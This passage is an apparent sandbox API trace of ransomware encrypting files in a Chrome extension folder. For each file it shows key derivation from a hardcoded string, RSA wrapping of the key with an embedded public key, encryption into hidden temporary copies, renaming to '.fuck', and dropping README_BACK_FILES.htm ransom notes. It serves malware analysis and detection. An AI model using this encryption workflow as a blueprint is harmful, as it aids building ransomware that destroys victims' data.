(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0250.883] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.884] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989270) returned 1 [0250.887] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.887] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.887] CryptHashData (hHash=0x2985a20, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.887] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2985a20, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985ba0) returned 1 [0250.887] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.887] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.887] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2989a68) returned 1 [0250.887] CryptImportPublicKeyInfo (in: hCryptProv=0x2989a68, dwCertEncodingType=0x1, pInfo=0x29921c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29921f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29921f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984160) returned 1 [0250.887] CryptEncrypt (in: hKey=0x2984160, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.888] CryptEncrypt (in: hKey=0x2984160, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2989ea8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2989ea8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.888] WriteFile (in: hFile=0x5d64, lpBuffer=0x2989ea8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2989ea8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.889] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x111, lpOverlapped=0x0) returned 1 [0250.890] CryptEncrypt (in: hKey=0x2985ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x111, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0250.890] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0250.890] CloseHandle (hObject=0x5d60) returned 1 [0250.890] CloseHandle (hObject=0x5d64) returned 1 [0250.890] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), bFailIfExists=0) returned 1 [0250.894] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x0) returned 1 [0250.894] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json.gsg")) returned 1 [0250.895] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json.fuck")) returned 1 [0250.896] CryptDestroyHash (hHash=0x2985a20) returned 1 [0250.896] CryptDestroyKey (hKey=0x2985ba0) returned 1 [0250.896] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0250.896] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.896] FindClose (in: hFindFile=0x2985f20 | out: hFindFile=0x2985f20) returned 1 [0250.896] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\readme_back_files.htm")) returned 0xffffffff [0250.896] AreFileApisANSI () returned 1 [0250.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0250.897] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.897] GetFileType (hFile=0x5d5c) returned 0x1 [0250.897] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.898] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.898] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ea0 [0250.899] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.899] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.899] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.899] GetLastError () returned 0x0 [0250.899] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json")) returned 0x20 [0250.899] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x80) returned 1 [0250.900] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0250.900] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0250.902] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.902] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989270) returned 1 [0250.904] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.904] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.904] CryptHashData (hHash=0x2985ba0, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.904] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2985ba0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985f20) returned 1 [0250.904] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.904] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.904] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2989380) returned 1 [0250.905] CryptImportPublicKeyInfo (in: hCryptProv=0x2989380, dwCertEncodingType=0x1, pInfo=0x2992b80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992bb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992bb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29845e0) returned 1 [0250.905] CryptEncrypt (in: hKey=0x29845e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.905] CryptEncrypt (in: hKey=0x29845e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2989518*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2989518*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.905] WriteFile (in: hFile=0x5d60, lpBuffer=0x2989518*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2989518*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.906] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x10b, lpOverlapped=0x0) returned 1 [0250.907] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x10b, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.907] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.907] CloseHandle (hObject=0x5d64) returned 1 [0250.907] CloseHandle (hObject=0x5d60) returned 1 [0250.907] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), bFailIfExists=0) returned 1 [0250.911] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x0) returned 1 [0250.911] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json.gsg")) returned 1 [0250.912] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json.fuck")) returned 1 [0250.913] CryptDestroyHash (hHash=0x2985ba0) returned 1 [0250.913] CryptDestroyKey (hKey=0x2985f20) returned 1 [0250.913] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0250.913] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.913] FindClose (in: hFindFile=0x2985ea0 | out: hFindFile=0x2985ea0) returned 1 [0250.913] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\readme_back_files.htm")) returned 0xffffffff [0250.914] AreFileApisANSI () returned 1 [0250.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0250.914] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.914] GetFileType (hFile=0x5d5c) returned 0x1 [0250.914] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.916] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0250.916] FindClose (in: hFindFile=0x29387b8 | out: hFindFile=0x29387b8) returned 1 [0250.916] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\readme_back_files.htm")) returned 0xffffffff [0250.916] AreFileApisANSI () returned 1 [0250.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0250.916] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0250.918] GetFileType (hFile=0x5d50) returned 0x1 [0250.918] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0250.920] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0250.920] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2985a20 [0250.921] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.921] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.921] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0250.921] GetLastError () returned 0x0 [0250.921] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json")) returned 0x20 [0250.921] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json", dwFileAttributes=0x80) returned 1 [0250.921] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.922] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0250.923] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.gsg", dwFileAttributes=0x2) returned 1 [0250.923] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2989270) returned 1 [0250.926] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0250.926] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.926] CryptHashData (hHash=0x2985ba0, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.926] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2985ba0, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2985ea0) returned 1 [0250.926] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----g", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.926] CryptDecodeObjectEx 